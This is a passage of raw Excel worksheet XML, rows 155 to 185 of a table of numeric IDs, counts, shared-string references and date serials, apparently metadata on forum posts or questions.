      <c r="C155" s="9" t="s">
        <v>2118</v>
      </c>
      <c r="D155" s="9" t="s">
        <v>2119</v>
      </c>
      <c r="E155" s="9">
        <v>106224</v>
      </c>
      <c r="F155" s="9" t="s">
        <v>2120</v>
      </c>
      <c r="G155" s="10">
        <v>41336.404166666667</v>
      </c>
      <c r="H155" s="9">
        <v>618598</v>
      </c>
      <c r="I155" s="9" t="s">
        <v>2121</v>
      </c>
      <c r="J155" s="10">
        <v>41333.711111111108</v>
      </c>
      <c r="K155" s="9" t="s">
        <v>965</v>
      </c>
      <c r="L155" s="7">
        <v>12</v>
      </c>
      <c r="M155" s="7">
        <v>7</v>
      </c>
      <c r="N155" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="156" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A156" s="3">
        <v>72140</v>
      </c>
      <c r="B156" s="3" t="s">
        <v>169</v>
      </c>
      <c r="C156" s="9" t="s">
        <v>2122</v>
      </c>
      <c r="D156" s="9" t="s">
        <v>2123</v>
      </c>
      <c r="E156" s="9">
        <v>12048</v>
      </c>
      <c r="F156" s="9" t="s">
        <v>2124</v>
      </c>
      <c r="G156" s="10">
        <v>41093.290277777778</v>
      </c>
      <c r="H156" s="9">
        <v>1033123</v>
      </c>
      <c r="I156" s="9" t="s">
        <v>2125</v>
      </c>
      <c r="J156" s="10">
        <v>41092.832638888889</v>
      </c>
      <c r="K156" s="3" t="s">
        <v>170</v>
      </c>
      <c r="L156" s="4">
        <v>3</v>
      </c>
      <c r="M156" s="4">
        <v>1</v>
      </c>
      <c r="N156" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O156" s="3"/>
      <c r="P156" s="3"/>
      <c r="Q156" s="3"/>
    </row>
    <row r="157" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A157" s="9">
        <v>72769</v>
      </c>
      <c r="B157" s="9" t="s">
        <v>966</v>
      </c>
      <c r="C157" s="9" t="s">
        <v>2126</v>
      </c>
      <c r="D157" s="9" t="s">
        <v>2127</v>
      </c>
      <c r="E157" s="9">
        <v>17034</v>
      </c>
      <c r="F157" s="9" t="s">
        <v>2128</v>
      </c>
      <c r="G157" s="10">
        <v>41995.945833333331</v>
      </c>
      <c r="H157" s="9">
        <v>3204551</v>
      </c>
      <c r="I157" s="9" t="s">
        <v>2129</v>
      </c>
      <c r="J157" s="10">
        <v>41995.921527777777</v>
      </c>
      <c r="K157" s="9" t="s">
        <v>967</v>
      </c>
      <c r="L157" s="7">
        <v>5</v>
      </c>
      <c r="M157" s="7">
        <v>3</v>
      </c>
      <c r="N157" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O157" s="9" t="s">
        <v>699</v>
      </c>
      <c r="P157" s="9" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="158" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A158" s="3">
        <v>74053</v>
      </c>
      <c r="B158" s="3" t="s">
        <v>171</v>
      </c>
      <c r="C158" s="9" t="s">
        <v>2130</v>
      </c>
      <c r="D158" s="9" t="s">
        <v>2131</v>
      </c>
      <c r="E158" s="9">
        <v>1987598</v>
      </c>
      <c r="F158" s="9" t="s">
        <v>2132</v>
      </c>
      <c r="G158" s="10">
        <v>41738.748611111114</v>
      </c>
      <c r="H158" s="9">
        <v>-1</v>
      </c>
      <c r="I158" s="9" t="s">
        <v>2025</v>
      </c>
      <c r="J158" s="10">
        <v>41738.748611111114</v>
      </c>
      <c r="K158" s="3" t="s">
        <v>172</v>
      </c>
      <c r="L158" s="4">
        <v>3</v>
      </c>
      <c r="M158" s="4">
        <v>1</v>
      </c>
      <c r="N158" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O158" s="3"/>
      <c r="P158" s="3"/>
      <c r="Q158" s="3"/>
    </row>
    <row r="159" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A159" s="3">
        <v>74664</v>
      </c>
      <c r="B159" s="3" t="s">
        <v>173</v>
      </c>
      <c r="C159" s="9" t="s">
        <v>2133</v>
      </c>
      <c r="D159" s="9" t="s">
        <v>2134</v>
      </c>
      <c r="E159" s="9">
        <v>168175</v>
      </c>
      <c r="F159" s="9" t="s">
        <v>2135</v>
      </c>
      <c r="G159" s="10">
        <v>42058.462500000001</v>
      </c>
      <c r="H159" s="9">
        <v>1263783</v>
      </c>
      <c r="I159" s="9" t="s">
        <v>2114</v>
      </c>
      <c r="J159" s="10">
        <v>42051.448611111111</v>
      </c>
      <c r="K159" s="3" t="s">
        <v>174</v>
      </c>
      <c r="L159" s="4">
        <v>5</v>
      </c>
      <c r="M159" s="4">
        <v>3</v>
      </c>
      <c r="N159" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O159" s="3"/>
      <c r="P159" s="3"/>
      <c r="Q159" s="3"/>
    </row>
    <row r="160" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A160" s="3">
        <v>74672</v>
      </c>
      <c r="B160" s="3" t="s">
        <v>175</v>
      </c>
      <c r="C160" s="9" t="s">
        <v>2136</v>
      </c>
      <c r="D160" s="9" t="s">
        <v>2137</v>
      </c>
      <c r="E160" s="9">
        <v>168175</v>
      </c>
      <c r="F160" s="9" t="s">
        <v>2135</v>
      </c>
      <c r="G160" s="10">
        <v>42058.461805555555</v>
      </c>
      <c r="H160" s="9">
        <v>1263783</v>
      </c>
      <c r="I160" s="9" t="s">
        <v>2114</v>
      </c>
      <c r="J160" s="10">
        <v>42051.448611111111</v>
      </c>
      <c r="K160" s="3" t="s">
        <v>176</v>
      </c>
      <c r="L160" s="4">
        <v>3</v>
      </c>
      <c r="M160" s="4">
        <v>1</v>
      </c>
      <c r="N160" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O160" s="3"/>
      <c r="P160" s="3"/>
      <c r="Q160" s="3"/>
    </row>
    <row r="161" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A161" s="9">
        <v>74883</v>
      </c>
      <c r="B161" s="9" t="s">
        <v>968</v>
      </c>
      <c r="C161" s="9" t="s">
        <v>2138</v>
      </c>
      <c r="D161" s="9" t="s">
        <v>2139</v>
      </c>
      <c r="E161" s="9">
        <v>2822</v>
      </c>
      <c r="F161" s="9" t="s">
        <v>2140</v>
      </c>
      <c r="G161" s="10">
        <v>39707.954861111109</v>
      </c>
      <c r="H161" s="9">
        <v>2822</v>
      </c>
      <c r="I161" s="9" t="s">
        <v>2140</v>
      </c>
      <c r="J161" s="10">
        <v>39707.73333333333</v>
      </c>
      <c r="K161" s="9" t="s">
        <v>969</v>
      </c>
      <c r="L161" s="7">
        <v>2</v>
      </c>
      <c r="M161" s="7">
        <v>1</v>
      </c>
      <c r="Q161" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="162" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A162" s="9">
        <v>75526</v>
      </c>
      <c r="B162" s="9" t="s">
        <v>970</v>
      </c>
      <c r="C162" s="9" t="s">
        <v>2141</v>
      </c>
      <c r="D162" s="9" t="s">
        <v>2142</v>
      </c>
      <c r="E162" s="9">
        <v>13281</v>
      </c>
      <c r="F162" s="9" t="s">
        <v>2143</v>
      </c>
      <c r="G162" s="10">
        <v>39707.777777777781</v>
      </c>
      <c r="H162" s="9">
        <v>31505</v>
      </c>
      <c r="I162" s="9" t="s">
        <v>2144</v>
      </c>
      <c r="J162" s="10">
        <v>39707.776388888888</v>
      </c>
      <c r="K162" s="9" t="s">
        <v>971</v>
      </c>
      <c r="L162" s="7">
        <v>3</v>
      </c>
      <c r="M162" s="7">
        <v>1</v>
      </c>
      <c r="N162" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="163" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A163" s="9">
        <v>75959</v>
      </c>
      <c r="B163" s="9" t="s">
        <v>972</v>
      </c>
      <c r="C163" s="9" t="s">
        <v>2145</v>
      </c>
      <c r="D163" s="9" t="s">
        <v>2146</v>
      </c>
      <c r="E163" s="9">
        <v>1300</v>
      </c>
      <c r="F163" s="9" t="s">
        <v>2147</v>
      </c>
      <c r="G163" s="10">
        <v>39843.892361111109</v>
      </c>
      <c r="H163" s="9">
        <v>1300</v>
      </c>
      <c r="I163" s="9" t="s">
        <v>2147</v>
      </c>
      <c r="J163" s="10">
        <v>39708.622916666667</v>
      </c>
      <c r="K163" s="9" t="s">
        <v>973</v>
      </c>
      <c r="L163" s="7">
        <v>3</v>
      </c>
      <c r="M163" s="7">
        <v>1</v>
      </c>
      <c r="N163" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="164" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A164" s="3">
        <v>76575</v>
      </c>
      <c r="B164" s="3" t="s">
        <v>177</v>
      </c>
      <c r="C164" s="9" t="s">
        <v>2148</v>
      </c>
      <c r="D164" s="9" t="s">
        <v>2149</v>
      </c>
      <c r="E164" s="9">
        <v>6436</v>
      </c>
      <c r="F164" s="9" t="s">
        <v>2150</v>
      </c>
      <c r="G164" s="10">
        <v>40214.199999999997</v>
      </c>
      <c r="H164" s="9">
        <v>63550</v>
      </c>
      <c r="I164" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J164" s="10">
        <v>40209.502083333333</v>
      </c>
      <c r="K164" s="3" t="s">
        <v>178</v>
      </c>
      <c r="L164" s="4">
        <v>3</v>
      </c>
      <c r="M164" s="4">
        <v>1</v>
      </c>
      <c r="N164" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O164" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P164" s="3"/>
      <c r="Q164" s="3"/>
    </row>
    <row r="165" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A165" s="9">
        <v>77086</v>
      </c>
      <c r="B165" s="9" t="s">
        <v>974</v>
      </c>
      <c r="C165" s="9" t="s">
        <v>2151</v>
      </c>
      <c r="D165" s="9" t="s">
        <v>2152</v>
      </c>
      <c r="E165" s="9">
        <v>3942918</v>
      </c>
      <c r="F165" s="9" t="s">
        <v>2153</v>
      </c>
      <c r="G165" s="10">
        <v>43457.472222222219</v>
      </c>
      <c r="H165" s="9">
        <v>5997596</v>
      </c>
      <c r="I165" s="9" t="s">
        <v>2154</v>
      </c>
      <c r="J165" s="10">
        <v>43457.466666666667</v>
      </c>
      <c r="K165" s="9" t="s">
        <v>975</v>
      </c>
      <c r="L165" s="7">
        <v>5</v>
      </c>
      <c r="M165" s="7">
        <v>3</v>
      </c>
      <c r="N165" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="166" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A166" s="3">
        <v>78155</v>
      </c>
      <c r="B166" s="3" t="s">
        <v>212</v>
      </c>
      <c r="C166" s="9" t="s">
        <v>2155</v>
      </c>
      <c r="D166" s="9" t="s">
        <v>2156</v>
      </c>
      <c r="E166" s="9">
        <v>22184</v>
      </c>
      <c r="F166" s="9" t="s">
        <v>2157</v>
      </c>
      <c r="G166" s="10">
        <v>40002.588888888888</v>
      </c>
      <c r="H166" s="9">
        <v>22184</v>
      </c>
      <c r="I166" s="9" t="s">
        <v>2157</v>
      </c>
      <c r="J166" s="10">
        <v>40002.586111111108</v>
      </c>
      <c r="K166" s="3" t="s">
        <v>213</v>
      </c>
      <c r="L166" s="4">
        <v>3</v>
      </c>
      <c r="M166" s="4">
        <v>1</v>
      </c>
      <c r="N166" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O166" s="3"/>
      <c r="P166" s="3"/>
      <c r="Q166" s="3"/>
    </row>
    <row r="167" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A167" s="3">
        <v>79022</v>
      </c>
      <c r="B167" s="3" t="s">
        <v>214</v>
      </c>
      <c r="C167" s="9" t="s">
        <v>2158</v>
      </c>
      <c r="D167" s="9" t="s">
        <v>2159</v>
      </c>
      <c r="E167" s="9">
        <v>9897</v>
      </c>
      <c r="F167" s="9" t="s">
        <v>2160</v>
      </c>
      <c r="G167" s="10">
        <v>43580.526388888888</v>
      </c>
      <c r="H167" s="9">
        <v>3344117</v>
      </c>
      <c r="I167" s="9" t="s">
        <v>2161</v>
      </c>
      <c r="J167" s="10">
        <v>43579.385416666664</v>
      </c>
      <c r="K167" s="3" t="s">
        <v>215</v>
      </c>
      <c r="L167" s="4">
        <v>11</v>
      </c>
      <c r="M167" s="4">
        <v>9</v>
      </c>
      <c r="N167" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O167" s="3"/>
      <c r="P167" s="3"/>
      <c r="Q167" s="3"/>
    </row>
    <row r="168" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A168" s="9">
        <v>79126</v>
      </c>
      <c r="B168" s="9" t="s">
        <v>976</v>
      </c>
      <c r="C168" s="9" t="s">
        <v>2162</v>
      </c>
      <c r="D168" s="9" t="s">
        <v>2163</v>
      </c>
      <c r="E168" s="9">
        <v>5302</v>
      </c>
      <c r="F168" s="9" t="s">
        <v>2164</v>
      </c>
      <c r="G168" s="10">
        <v>39708.311111111114</v>
      </c>
      <c r="H168" s="9">
        <v>5302</v>
      </c>
      <c r="I168" s="9" t="s">
        <v>2164</v>
      </c>
      <c r="J168" s="10">
        <v>39708.310416666667</v>
      </c>
      <c r="K168" s="9" t="s">
        <v>977</v>
      </c>
      <c r="L168" s="7">
        <v>4</v>
      </c>
      <c r="M168" s="7">
        <v>2</v>
      </c>
      <c r="N168" s="9" t="s">
        <v>706</v>
      </c>
      <c r="Q168" s="9" t="s">
        <v>978</v>
      </c>
    </row>
    <row r="169" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A169" s="3">
        <v>79601</v>
      </c>
      <c r="B169" s="3" t="s">
        <v>216</v>
      </c>
      <c r="C169" s="9" t="s">
        <v>2165</v>
      </c>
      <c r="D169" s="9" t="s">
        <v>2166</v>
      </c>
      <c r="E169" s="9">
        <v>15541</v>
      </c>
      <c r="F169" s="9" t="s">
        <v>2167</v>
      </c>
      <c r="G169" s="10">
        <v>42517.809027777781</v>
      </c>
      <c r="H169" s="9">
        <v>15541</v>
      </c>
      <c r="I169" s="9" t="s">
        <v>2167</v>
      </c>
      <c r="J169" s="10">
        <v>42517.803472222222</v>
      </c>
      <c r="K169" s="3" t="s">
        <v>217</v>
      </c>
      <c r="L169" s="4">
        <v>5</v>
      </c>
      <c r="M169" s="4">
        <v>3</v>
      </c>
      <c r="N169" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O169" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P169" s="3" t="s">
        <v>711</v>
      </c>
      <c r="Q169" s="3"/>
    </row>
    <row r="170" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A170" s="9">
        <v>79923</v>
      </c>
      <c r="B170" s="9" t="s">
        <v>979</v>
      </c>
      <c r="C170" s="9" t="s">
        <v>2168</v>
      </c>
      <c r="D170" s="9" t="s">
        <v>2169</v>
      </c>
      <c r="E170" s="9">
        <v>426671</v>
      </c>
      <c r="F170" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G170" s="10">
        <v>42816.684027777781</v>
      </c>
      <c r="H170" s="9">
        <v>7275984</v>
      </c>
      <c r="I170" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J170" s="10">
        <v>42815.861805555556</v>
      </c>
      <c r="K170" s="9" t="s">
        <v>980</v>
      </c>
      <c r="L170" s="7">
        <v>14</v>
      </c>
      <c r="M170" s="7">
        <v>12</v>
      </c>
      <c r="N170" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="171" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A171" s="3">
        <v>80056</v>
      </c>
      <c r="B171" s="3" t="s">
        <v>250</v>
      </c>
      <c r="C171" s="9" t="s">
        <v>2171</v>
      </c>
      <c r="D171" s="9" t="s">
        <v>2172</v>
      </c>
      <c r="E171" s="9">
        <v>10936</v>
      </c>
      <c r="F171" s="9" t="s">
        <v>2173</v>
      </c>
      <c r="G171" s="10">
        <v>40813.220833333333</v>
      </c>
      <c r="H171" s="9">
        <v>764846</v>
      </c>
      <c r="I171" s="9" t="s">
        <v>1665</v>
      </c>
      <c r="J171" s="10">
        <v>40810.006249999999</v>
      </c>
      <c r="K171" s="3" t="s">
        <v>251</v>
      </c>
      <c r="L171" s="4">
        <v>3</v>
      </c>
      <c r="M171" s="4">
        <v>1</v>
      </c>
      <c r="N171" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O171" s="3" t="s">
        <v>705</v>
      </c>
      <c r="P171" s="3"/>
      <c r="Q171" s="3"/>
    </row>
    <row r="172" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A172" s="3">
        <v>80675</v>
      </c>
      <c r="B172" s="3" t="s">
        <v>252</v>
      </c>
      <c r="C172" s="9" t="s">
        <v>2174</v>
      </c>
      <c r="D172" s="9" t="s">
        <v>2175</v>
      </c>
      <c r="E172" s="9">
        <v>14750</v>
      </c>
      <c r="F172" s="9" t="s">
        <v>2176</v>
      </c>
      <c r="G172" s="10">
        <v>42408.828472222223</v>
      </c>
      <c r="H172" s="9">
        <v>92701</v>
      </c>
      <c r="I172" s="9" t="s">
        <v>2177</v>
      </c>
      <c r="J172" s="10">
        <v>42408.627083333333</v>
      </c>
      <c r="K172" s="3" t="s">
        <v>253</v>
      </c>
      <c r="L172" s="4">
        <v>3</v>
      </c>
      <c r="M172" s="4">
        <v>1</v>
      </c>
      <c r="N172" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O172" s="3"/>
      <c r="P172" s="3"/>
      <c r="Q172" s="3"/>
    </row>
    <row r="173" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A173" s="9">
        <v>81008</v>
      </c>
      <c r="B173" s="9" t="s">
        <v>981</v>
      </c>
      <c r="C173" s="9" t="s">
        <v>2178</v>
      </c>
      <c r="D173" s="9" t="s">
        <v>2179</v>
      </c>
      <c r="E173" s="9">
        <v>30280</v>
      </c>
      <c r="F173" s="9" t="s">
        <v>2180</v>
      </c>
      <c r="G173" s="10">
        <v>39968.36041666667</v>
      </c>
      <c r="H173" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I173" s="9" t="s">
        <v>2181</v>
      </c>
      <c r="J173" s="10">
        <v>39968.35833333333</v>
      </c>
      <c r="K173" s="9" t="s">
        <v>982</v>
      </c>
      <c r="L173" s="7">
        <v>6</v>
      </c>
      <c r="M173" s="7">
        <v>1</v>
      </c>
      <c r="N173" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="174" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A174" s="3">
        <v>81329</v>
      </c>
      <c r="B174" s="5" t="s">
        <v>254</v>
      </c>
      <c r="C174" s="9" t="s">
        <v>2182</v>
      </c>
      <c r="D174" s="9" t="s">
        <v>2183</v>
      </c>
      <c r="E174" s="9">
        <v>249011</v>
      </c>
      <c r="F174" s="9" t="s">
        <v>2184</v>
      </c>
      <c r="G174" s="10">
        <v>42004.496527777781</v>
      </c>
      <c r="H174" s="9">
        <v>836890</v>
      </c>
      <c r="I174" s="9" t="s">
        <v>2185</v>
      </c>
      <c r="J174" s="10">
        <v>41989.351388888892</v>
      </c>
      <c r="K174" s="3" t="s">
        <v>255</v>
      </c>
      <c r="L174" s="4">
        <v>5</v>
      </c>
      <c r="M174" s="4">
        <v>3</v>
      </c>
      <c r="N174" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O174" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P174" s="3"/>
      <c r="Q174" s="3"/>
    </row>
    <row r="175" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A175" s="3">
        <v>81427</v>
      </c>
      <c r="B175" s="3" t="s">
        <v>256</v>
      </c>
      <c r="C175" s="9" t="s">
        <v>2186</v>
      </c>
      <c r="D175" s="9" t="s">
        <v>2187</v>
      </c>
      <c r="E175" s="9">
        <v>81424</v>
      </c>
      <c r="F175" s="9" t="s">
        <v>2188</v>
      </c>
      <c r="G175" s="10">
        <v>40806.840277777781</v>
      </c>
      <c r="H175" s="9">
        <v>910651</v>
      </c>
      <c r="I175" s="9" t="s">
        <v>2189</v>
      </c>
      <c r="J175" s="10">
        <v>40806.727777777778</v>
      </c>
      <c r="K175" s="3" t="s">
        <v>257</v>
      </c>
      <c r="L175" s="4">
        <v>8</v>
      </c>
      <c r="M175" s="4">
        <v>6</v>
      </c>
      <c r="N175" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O175" s="3" t="s">
        <v>705</v>
      </c>
      <c r="P175" s="3" t="s">
        <v>698</v>
      </c>
      <c r="Q175" s="3"/>
    </row>
    <row r="176" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A176" s="9">
        <v>81459</v>
      </c>
      <c r="B176" s="9" t="s">
        <v>983</v>
      </c>
      <c r="C176" s="9" t="s">
        <v>2190</v>
      </c>
      <c r="D176" s="9" t="s">
        <v>2191</v>
      </c>
      <c r="E176" s="9">
        <v>15415</v>
      </c>
      <c r="F176" s="9" t="s">
        <v>2192</v>
      </c>
      <c r="G176" s="10">
        <v>39708.552777777775</v>
      </c>
      <c r="H176" s="9">
        <v>3394</v>
      </c>
      <c r="I176" s="9" t="s">
        <v>2193</v>
      </c>
      <c r="J176" s="10">
        <v>39708.51666666667</v>
      </c>
      <c r="K176" s="9" t="s">
        <v>984</v>
      </c>
      <c r="L176" s="7">
        <v>4</v>
      </c>
      <c r="M176" s="7">
        <v>2</v>
      </c>
      <c r="N176" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="177" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A177" s="9">
        <v>81584</v>
      </c>
      <c r="B177" s="9" t="s">
        <v>985</v>
      </c>
      <c r="C177" s="9" t="s">
        <v>2194</v>
      </c>
      <c r="D177" s="9" t="s">
        <v>2195</v>
      </c>
      <c r="E177" s="9">
        <v>15461</v>
      </c>
      <c r="F177" s="9" t="s">
        <v>2196</v>
      </c>
      <c r="G177" s="10">
        <v>40147.540972222225</v>
      </c>
      <c r="H177" s="9">
        <v>183575</v>
      </c>
      <c r="I177" s="9" t="s">
        <v>2197</v>
      </c>
      <c r="J177" s="10">
        <v>40145.843055555553</v>
      </c>
      <c r="K177" s="9" t="s">
        <v>986</v>
      </c>
      <c r="L177" s="7">
        <v>43</v>
      </c>
      <c r="M177" s="7">
        <v>41</v>
      </c>
      <c r="N177" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="178" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A178" s="3">
        <v>81609</v>
      </c>
      <c r="B178" s="3" t="s">
        <v>312</v>
      </c>
      <c r="C178" s="9" t="s">
        <v>2198</v>
      </c>
      <c r="D178" s="9" t="s">
        <v>2199</v>
      </c>
      <c r="E178" s="9">
        <v>541136</v>
      </c>
      <c r="F178" s="9" t="s">
        <v>2200</v>
      </c>
      <c r="G178" s="10">
        <v>41968.96875</v>
      </c>
      <c r="H178" s="9">
        <v>2829009</v>
      </c>
      <c r="I178" s="9" t="s">
        <v>2201</v>
      </c>
      <c r="J178" s="10">
        <v>41964.509722222225</v>
      </c>
      <c r="K178" s="3" t="s">
        <v>313</v>
      </c>
      <c r="L178" s="4">
        <v>7</v>
      </c>
      <c r="M178" s="4">
        <v>5</v>
      </c>
      <c r="N178" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O178" s="3"/>
      <c r="P178" s="3"/>
      <c r="Q178" s="3"/>
    </row>
    <row r="179" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A179" s="3">
        <v>82553</v>
      </c>
      <c r="B179" s="3" t="s">
        <v>314</v>
      </c>
      <c r="C179" s="9" t="s">
        <v>2202</v>
      </c>
      <c r="D179" s="9" t="s">
        <v>2203</v>
      </c>
      <c r="E179" s="9">
        <v>6910</v>
      </c>
      <c r="F179" s="9" t="s">
        <v>2204</v>
      </c>
      <c r="G179" s="10">
        <v>43060.599305555559</v>
      </c>
      <c r="H179" s="9">
        <v>103050</v>
      </c>
      <c r="I179" s="9" t="s">
        <v>2205</v>
      </c>
      <c r="J179" s="10">
        <v>43057.38958333333</v>
      </c>
      <c r="K179" s="3" t="s">
        <v>315</v>
      </c>
      <c r="L179" s="4">
        <v>4</v>
      </c>
      <c r="M179" s="4">
        <v>2</v>
      </c>
      <c r="N179" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O179" s="3"/>
      <c r="P179" s="3"/>
      <c r="Q179" s="3"/>
    </row>
    <row r="180" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A180" s="3">
        <v>82852</v>
      </c>
      <c r="B180" s="3" t="s">
        <v>316</v>
      </c>
      <c r="C180" s="9" t="s">
        <v>2206</v>
      </c>
      <c r="D180" s="9" t="s">
        <v>2207</v>
      </c>
      <c r="E180" s="9">
        <v>194586</v>
      </c>
      <c r="F180" s="9" t="s">
        <v>2208</v>
      </c>
      <c r="G180" s="10">
        <v>41982.943055555559</v>
      </c>
      <c r="H180" s="9">
        <v>64911</v>
      </c>
      <c r="I180" s="9" t="s">
        <v>2209</v>
      </c>
      <c r="J180" s="10">
        <v>41948.894444444442</v>
      </c>
      <c r="K180" s="3" t="s">
        <v>317</v>
      </c>
      <c r="L180" s="4">
        <v>4</v>
      </c>
      <c r="M180" s="4">
        <v>2</v>
      </c>
      <c r="N180" s="3"/>
      <c r="O180" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P180" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q180" s="3"/>
    </row>
    <row r="181" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A181" s="9">
        <v>82875</v>
      </c>
      <c r="B181" s="9" t="s">
        <v>987</v>
      </c>
      <c r="C181" s="9" t="s">
        <v>2210</v>
      </c>
      <c r="D181" s="9" t="s">
        <v>2211</v>
      </c>
      <c r="E181" s="9">
        <v>974</v>
      </c>
      <c r="F181" s="9" t="s">
        <v>2212</v>
      </c>
      <c r="G181" s="10">
        <v>42506.6</v>
      </c>
      <c r="H181" s="9">
        <v>3636071</v>
      </c>
      <c r="I181" s="9" t="s">
        <v>2213</v>
      </c>
      <c r="J181" s="10">
        <v>42506.32916666667</v>
      </c>
      <c r="K181" s="9" t="s">
        <v>988</v>
      </c>
      <c r="L181" s="7">
        <v>9</v>
      </c>
      <c r="M181" s="7">
        <v>7</v>
      </c>
      <c r="N181" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="182" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A182" s="9">
        <v>82971</v>
      </c>
      <c r="B182" s="9" t="s">
        <v>989</v>
      </c>
      <c r="C182" s="9" t="s">
        <v>2214</v>
      </c>
      <c r="D182" s="9" t="s">
        <v>2215</v>
      </c>
      <c r="E182" s="9">
        <v>3853</v>
      </c>
      <c r="F182" s="9" t="s">
        <v>2216</v>
      </c>
      <c r="G182" s="10">
        <v>42637.995138888888</v>
      </c>
      <c r="H182" s="9">
        <v>63550</v>
      </c>
      <c r="I182" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J182" s="10">
        <v>42418.808333333334</v>
      </c>
      <c r="K182" s="9" t="s">
        <v>990</v>
      </c>
      <c r="L182" s="7">
        <v>4</v>
      </c>
      <c r="M182" s="7">
        <v>2</v>
      </c>
      <c r="N182" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="183" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A183" s="3">
        <v>84291</v>
      </c>
      <c r="B183" s="3" t="s">
        <v>318</v>
      </c>
      <c r="C183" s="9" t="s">
        <v>2217</v>
      </c>
      <c r="D183" s="9" t="s">
        <v>2218</v>
      </c>
      <c r="E183" s="9">
        <v>7914637</v>
      </c>
      <c r="F183" s="9" t="s">
        <v>2219</v>
      </c>
      <c r="G183" s="10">
        <v>43439.320833333331</v>
      </c>
      <c r="H183" s="9">
        <v>1257372</v>
      </c>
      <c r="I183" s="9" t="s">
        <v>2220</v>
      </c>
      <c r="J183" s="10">
        <v>42727.597222222219</v>
      </c>
      <c r="K183" s="3" t="s">
        <v>319</v>
      </c>
      <c r="L183" s="4">
        <v>4</v>
      </c>
      <c r="M183" s="4">
        <v>2</v>
      </c>
      <c r="N183" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O183" s="3"/>
      <c r="P183" s="3"/>
      <c r="Q183" s="3"/>
    </row>
    <row r="184" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A184" s="3">
        <v>84499</v>
      </c>
      <c r="B184" s="3" t="s">
        <v>320</v>
      </c>
      <c r="C184" s="9" t="s">
        <v>2221</v>
      </c>
      <c r="D184" s="9" t="s">
        <v>2222</v>
      </c>
      <c r="E184" s="9">
        <v>4186</v>
      </c>
      <c r="F184" s="9" t="s">
        <v>2223</v>
      </c>
      <c r="G184" s="10">
        <v>39946.45416666667</v>
      </c>
      <c r="H184" s="9">
        <v>4186</v>
      </c>
      <c r="I184" s="9" t="s">
        <v>2223</v>
      </c>
      <c r="J184" s="10">
        <v>39946.448611111111</v>
      </c>
      <c r="K184" s="3" t="s">
        <v>321</v>
      </c>
      <c r="L184" s="4">
        <v>3</v>
      </c>
      <c r="M184" s="4">
        <v>1</v>
      </c>
      <c r="N184" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O184" s="3"/>
      <c r="P184" s="3"/>
      <c r="Q184" s="3"/>
    </row>
    <row r="185" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A185" s="9">
        <v>84556</v>
      </c>
      <c r="B185" s="9" t="s">
        <v>991</v>
      </c>
      <c r="C185" s="9" t="s">
        <v>2224</v>
      </c>
      <c r="D185" s="9" t="s">
        <v>2225</v>
      </c>
      <c r="E185" s="9">
        <v>1</v>
      </c>
